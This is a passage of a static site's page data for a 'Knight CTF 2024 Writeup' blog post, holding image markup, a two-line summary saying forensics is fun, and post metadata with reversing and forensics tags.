0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJklEQVQY0z2QSWvCUBSFQ2nFYdFK2iia0hqTGBMzIXbjzpWlIC4SYqUqiOIA/v/l13ezcHF499zpnXu0MAxJ0xTf96nVamiahmmaBEGA1CzLwvM8XNct0et06LTb2I5NkiT0+n0+9Vc+mjqu6tNutxuC6/XKcrlkPp+z3W45n89cLhf2+z2n04nj8cjhcGCf5fyqvq/JhFarVYp4MwwMhXq9jrbb7dhsNqzXa2azGdPplMViwWq1Issy8jwva0VRlMsLFf99/xD2LB6eHqlWq9i2zUCpq1QqaCJ7PB4zGo1oNBr3k6MoukPOF0sEw+EQT2xwnJK7alkSxQQqL1yL47j0UIZ0XS9li2+ySPLin3gpH8or3FexIHVc/O47g66J/Wbw3HzhH82jnhXyNOfZAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/81ebcd671d7f9a751539b7507ff469b5/8ac56/image-20240123225135938.webp 240w,\n/static/81ebcd671d7f9a751539b7507ff469b5/d3be9/image-20240123225135938.webp 480w,\n/static/81ebcd671d7f9a751539b7507ff469b5/b0a15/image-20240123225135938.webp 500w\"\n              sizes=\"(max-width: 500px) 100vw, 500px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/81ebcd671d7f9a751539b7507ff469b5/8ff5a/image-20240123225135938.png 240w,\n/static/81ebcd671d7f9a751539b7507ff469b5/e85cb/image-20240123225135938.png 480w,\n/static/81ebcd671d7f9a751539b7507ff469b5/0b533/image-20240123225135938.png 500w\"\n            sizes=\"(max-width: 500px) 100vw, 500px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/81ebcd671d7f9a751539b7507ff469b5/0b533/image-20240123225135938.png\"\n            alt=\"image-20240123225135938\"\n            title=\"image-20240123225135938\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>There were so many challenges that I got tired just writing this writeup.</p>\n<p>Forensics really is fun.</p>","fields":{"slug":"/ctf-knight-ctf-2024-en","tagSlugs":["/tag/rev-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2024-01-23","description":"Knight CTF 2024 Writeup","tags":["Rev (en)","Forensic (en)","English"],"title":"Knight CTF 2024 Writeup","socialImage":{"publicURL":"/static/e353d4b1696f0dba9be231a7cddd182f/ctf-knight-ctf-2024.png"}}}},"pageContext":{"slug":"/ctf-knight-ctf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}